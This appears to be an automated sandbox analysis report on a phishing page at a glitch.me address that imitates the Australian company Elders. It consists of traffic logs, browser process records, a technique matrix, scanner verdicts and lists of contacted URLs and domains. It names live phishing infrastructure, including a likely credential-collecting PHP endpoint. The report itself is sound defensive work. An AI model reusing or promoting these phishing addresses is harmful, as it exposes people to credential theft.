Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 443
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.253.45:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: classification engineClassification label: mal52.phis.win@19/198@87/27
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1956,i,11158278246956056668,10871386056011559057,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://astonishing-maize-sunstone.glitch.me/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1956,i,11158278246956056668,10871386056011559057,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://astonishing-maize-sunstone.glitch.me/100%Avira URL Cloudphishing
https://astonishing-maize-sunstone.glitch.me/100%SlashNextCredential Stealing type: Phishing & Social Engineering
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://github.com/facebook/react/issues/136100%Avira URL Cloudsafe
https://reactjs.org/link/dangerously-set-inner-html0%Avira URL Cloudsafe
https://github.com/facebook/react/pull/22064.0%Avira URL Cloudsafe
https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-react.lc-2d7df618eb528a2ce626641aaccea776-lc.min.js0%Avira URL Cloudsafe
https://elders.com.au/content/dam/eld/icons---logos/icons/el-logo-2.svg0%Avira URL Cloudsafe
https://github.com/facebook/react/issues/224590%Avira URL Cloudsafe
https://v8.dev/blog/elements-kinds#avoid-creating-holes0%Avira URL Cloudsafe
https://url.spec.whatwg.org/#url-parsing0%Avira URL Cloudsafe
https://elders.com.au/content/dam/eld/images/livestocknow/close_up_ram_head_horns.png0%Avira URL Cloudsafe
https://connect.facebook.net/signals/config/253007270729203?v=2.9.176&r=stable&domain=elders.com.au&hme=872f04a0547459b3285cb03b0d7a47bfde40628f4b386809918a621e2688602f&ex_m=70%2C121%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C172%2C175%2C187%2C183%2C184%2C186%2C29%2C101%2C53%2C77%2C185%2C167%2C170%2C180%2C181%2C188%2C131%2C41%2C189%2C190%2C34%2C143%2C15%2C50%2C195%2C194%2C133%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C168%2C171%2C140%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113%2C201%2C200%2C202%2C207%2C208%2C209%2C205%2C197%2C132%2C134%2C163%2C196%2C198%2C122%2C157%2C145%2C151%2C129%2C233%2C116%2C126%2C127%2C234%2C165%2C119%2C236%2C166%2C136%2C123%2C154%2C148%2C193%2C114%2C1280%Avira URL Cloudsafe
https://kit.fontawesome.com/f6136e9b49.js0%Avira URL Cloudsafe
https://github.com/facebook/react/issues/131880%Avira URL Cloudsafe
https://reactjs.org/docs/react-api.html#reactchildrencount0%Avira URL Cloudsafe
https://elders.com.au/etc.clientlibs/aap2/aap2-core/clientlibs/v2/ax-fx-clientlibs-body.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.css0%Avira URL Cloudsafe
https://yourir.info/lib/1.15.18/yourir.css0%Avira URL Cloudsafe
https://connect.facebook.net/signals/config/842278510644971?v=2.9.176&r=stable&domain=elders.com.au&hme=872f04a0547459b3285cb03b0d7a47bfde40628f4b386809918a621e2688602f&ex_m=70%2C121%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C172%2C175%2C187%2C183%2C184%2C186%2C29%2C101%2C53%2C77%2C185%2C167%2C170%2C180%2C181%2C188%2C131%2C41%2C189%2C190%2C34%2C143%2C15%2C50%2C195%2C194%2C133%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C168%2C171%2C140%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113%2C201%2C200%2C202%2C207%2C208%2C209%2C205%2C197%2C132%2C134%2C163%2C196%2C198%2C122%2C157%2C145%2C151%2C129%2C233%2C116%2C126%2C127%2C234%2C165%2C119%2C236%2C166%2C136%2C123%2C154%2C148%2C193%2C114%2C1280%Avira URL Cloudsafe
https://www.eldersrealestate.com.au/&#34;0%Avira URL Cloudsafe
https://apimprd.ext.elders.com.au/api/v1/WeatherDetail?postCode=50000%Avira URL Cloudsafe
https://elders.com.au/etc.clientlibs/clientlibs/granite/utils.lc-899004cc02c33efc1f6694b1aee587fd-lc.min.js0%Avira URL Cloudsafe
https://upload.wikimedia.org/wikipedia/commons/thumb/4/42/Adobe_Acrobat_DC_logo_2020.svg/384px-Adobe0%Avira URL Cloudsafe
https://reactjs.org/link/react-devtools0%Avira URL Cloudsafe
https://unpkg.com/react-dom@18/umd/react-dom.development.js0%Avira URL Cloudsafe
https://unpkg.com/react-dom@18.3.1/umd/react-dom.development.js0%Avira URL Cloudsafe
https://elders.com.au/content/dam/eld/icons---logos/logos/Red_logo.png0%Avira URL Cloudsafe
https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-dependencies.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.js0%Avira URL Cloudsafe
https://github.com/facebook/react/issues/125060%Avira URL Cloudsafe
https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-base.lc-e592021eafd59de123415ab937a09f08-lc.min.js0%Avira URL Cloudsafe
https://github.com/facebook/react/issues/125020%Avira URL Cloudsafe
https://assets.adobedtm.com/728d44811931/14db0b582053/launch-f5e74cc94fc9.js0%Avira URL Cloudsafe
https://upload.wikimedia.org/wikipedia/commons/thumb/4/42/Adobe_Acrobat_DC_logo_2020.svg/384px-Adobe_Acrobat_DC_logo_2020.svg.png0%Avira URL Cloudsafe
https://unpkg.com/react@18/umd/react.development.js0%Avira URL Cloudsafe
https://github.com/facebook/react/issues/143650%Avira URL Cloudsafe
https://dpm.demdex.net/ibs:dpid=411&dpuuid=ZynRTwAAAMtunQN-0%Avira URL Cloudsafe
https://milo.za.com//pood/phpp4all.php0%Avira URL Cloudsafe
https://dpm.demdex.net/id?d_visid_ver=5.5.0&d_fieldgroup=MC&d_rtbd=json&d_ver=2&d_orgid=812E14B761A133470A495CCA%40AdobeOrg&d_nsid=0&ts=17307938034030%Avira URL Cloudsafe
https://reactjs.org/docs/react-api.html#reactchildrentoarray0%Avira URL Cloudsafe
https://reactjs.org/link/error-boundaries0%Avira URL Cloudsafe
https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-site.lc-46a2df1a9bfaeeffbd5b53738ed986e6-lc.min.js0%Avira URL Cloudsafe
https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-react/resources/static/media/Meta-Pro-Medium.afe5599c.ttf0%Avira URL Cloudsafe
https://reactjs.org/link/setstate-in-render0%Avira URL Cloudsafe
https://www.eldersrealestate.com.au/0%Avira URL Cloudsafe
https://infra.spec.whatwg.org/#ascii-tab-or-newline0%Avira URL Cloudsafe
https://github.com/facebook/react/issues/129950%Avira URL Cloudsafe
https://elders.com.au/content/dam/eld/icons---logos/icons/branch-services/corporate-office-icon.png0%Avira URL Cloudsafe
https://github.com/facebook/react/issues/21712).0%Avira URL Cloudsafe
https://eldersrural.sc.omtrdc.net/b/ss/elders-prod-global/1/JS-2.27.0-LEWM/s87866206656359?AQB=1&ndh=1&pf=1&t=5%2F10%2F2024%203%3A3%3A25%202%20300&mid=55744627521858828850627066940577006981&aamlh=6&ce=UTF-8&cdp=3&fpCookieDomainPeriods=3&pageName=elders%3Ahomepage&g=https%3A%2F%2Felders.com.au%2F&r=https%3A%2F%2Fastonishing-maize-sunstone.glitch.me%2F&c.&p_fo=3.0&getPageLoadTime=2.0.2&performanceWriteFull=1.0&performanceWritePart=1.0&performanceCheck=1.0&cm.&ssf=1&.cm&.c&cc=AUD&server=https%3A%2F%2Felders.com.au%2F&events=event1&aamb=6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y&c1=D%3Dv1&v1=elders&c2=D%3Dv2&v2=https%3A%2F%2Felders.com.au%2F&c3=D%3Dv4&v3=AEM&c4=D%3Dv5&v4=elders%3Ahomepage&c5=D%3Dv6&v5=https%3A%2F%2Felders.com.au%2F&c6=D%3Dv7&v6=Home&c7=D%3Dv8&c8=D%3Dv9&v8=https%3A%2F%2Fastonishing-maize-sunstone.glitch.me%2F&c9=D%3Dv10&c10=D%3Dv11&c11=D%3Dv12&c13=D%3Dv14&v13=elders%20-%20home%20page&c14=D%3Dv15&c15=D%3Dv19&c16=D%3Dv17&c17=D%3Dv20&c18=D%3Dv21&v18=55744627521858828850627066940577006981&c24=D%3Dv26&v24=NaN&c25=D%3Dv27&c26=D%3Dv28&v200=production%3A2024-08-29T04%3A29%3A57Z&s=1280x1024&c=24&j=1.6&v=N&k=Y&bw=1280&bh=907&mcorgid=812E14B761A133470A495CCA%40AdobeOrg&AQE=10%Avira URL Cloudsafe
https://reactjs.org/link/hooks-data-fetching0%Avira URL Cloudsafe
https://elders.com.au/content/dam/eld/images/homepage-banners/modern_home.jpg0%Avira URL Cloudsafe
https://github.com/facebook/react/issues/119180%Avira URL Cloudsafe
https://www.facebook.com/tr/?id=1013340413305983&ev=PageView&dl=https%3A%2F%2Felders.com.au%2F&rl=https%3A%2F%2Fastonishing-maize-sunstone.glitch.me%2F&if=false&ts=1730793804756&sw=1280&sh=1024&v=2.9.176&r=stable&ec=0&o=4126&fbp=fb.2.1730793804748.70395038985089435&cs_est=true&ler=other&cdl=API_unavailable&it=1730793802669&coo=false&rqm=GET0%Avira URL Cloudsafe
https://elders.com.au/content/dam/eld/images/homepage-banners/staff_background_wheat.jpg0%Avira URL Cloudsafe
https://reactjs.org/link/rules-of-hooks0%Avira URL Cloudsafe
https://assets.adobedtm.com/728d44811931/14db0b582053/cbed442a9121/RCbad2c954d87f48819c96e16d0db65670%Avira URL Cloudsafe
https://twitter.com/elderslimited0%Avira URL Cloudsafe
http://www.linkedin.com/company/elderslimited/0%Avira URL Cloudsafe
https://github.com/facebook/react/issues/207560%Avira URL Cloudsafe
https://github.com/facebook/react/issues/118070%Avira URL Cloudsafe
https://elders.com.au/etc.clientlibs/foundation/clientlibs/jquery.lc-dd9b395c741ce2784096e26619e14910-lc.min.js0%Avira URL Cloudsafe
https://github.com/mozilla/gecko-dev/blob/4e638efc71/layout/style/test/property_database.js0%Avira URL Cloudsafe
https://assets.adobedtm.com/extensions/EP8757b503532a44a68eee17773f6f10a0/AppMeasurement_Module_Acti0%Avira URL Cloudsafe
https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-cart.svg0%Avira URL Cloudsafe
https://reactjs.org/docs/react-api.html#createelement0%Avira URL Cloudsafe
https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-dependencies.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.css0%Avira URL Cloudsafe
https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-react/resources/static/media/icon-up-arrow.f3ebe431.svg0%Avira URL Cloudsafe
https://elders.com.au/.model.json0%Avira URL Cloudsafe
https://github.com/facebook/react/pull/10676.0%Avira URL Cloudsafe
https://github.com/facebook/react/pull/19216.0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
star-mini.c10r.facebook.com
157.240.253.35
truefalse
    high
    eldersrural.sc.omtrdc.net
    63.140.62.17
    truefalse
      unknown
      s-part-0017.t-0009.fb-t-msedge.net
      13.107.253.45
      truefalse
        high
        s-part-0017.t-0009.t-msedge.net
        13.107.246.45
        truefalse
          high
          default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
          217.20.57.36
          truefalse
            high
            yourir.info
            45.76.112.20
            truefalse
              unknown
              fp2e7a.wpc.phicdn.net
              192.229.221.95
              truefalse
                high
                d26p066pn2w0s0.cloudfront.net
                13.32.27.129
                truefalse
                  unknown
                  bg.microsoft.map.fastly.net
                  199.232.210.172
                  truefalse
                    high
                    milo.za.com
                    188.114.96.3
                    truefalse
                      unknown
                      scontent.xx.fbcdn.net
                      157.240.253.1
                      truefalse
                        high
                        astonishing-maize-sunstone.glitch.me
                        54.81.94.16
                        truefalse
                          unknown
                          elders.com.au
                          162.159.140.34
                          truetrue
                            unknown
                            cdnjs.cloudflare.com
                            104.17.24.14
                            truefalse
                              high
                              www.google.com
                              142.250.186.164
                              truefalse
                                high
                                upload.wikimedia.org
                                185.15.59.240
                                truefalse
                                  high
                                  apimprd.ext.elders.com.au
                                  162.159.140.34
                                  truefalse
                                    unknown
                                    dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com
                                    34.251.39.134
                                    truefalse
                                      high
                                      unpkg.com
                                      104.17.249.203
                                      truefalse
                                        high
                                        www.facebook.com
                                        unknown
                                        unknownfalse
                                          high
                                          cdn.mouseflow.com
                                          unknown
                                          unknownfalse
                                            unknown
                                            ka-f.fontawesome.com
                                            unknown
                                            unknownfalse
                                              high
                                              cdn.jsdelivr.net
                                              unknown
                                              unknownfalse
                                                high
                                                kit.fontawesome.com
                                                unknown
                                                unknownfalse
                                                  high
                                                  assets.adobedtm.com
                                                  unknown
                                                  unknownfalse
                                                    high
                                                    www.clarity.ms
                                                    unknown
                                                    unknownfalse
                                                      high
                                                      w.clarity.ms
                                                      unknown
                                                      unknownfalse
                                                        unknown
                                                        connect.facebook.net
                                                        unknown
                                                        unknownfalse
                                                          high
                                                          cm.everesttech.net
                                                          unknown
                                                          unknownfalse
                                                            high
                                                            eldersrural.demdex.net
                                                            unknown
                                                            unknownfalse
                                                              unknown
                                                              logo.clearbit.com
                                                              unknown
                                                              unknownfalse
                                                                unknown
                                                                dpm.demdex.net
                                                                unknown
                                                                unknownfalse
                                                                  high
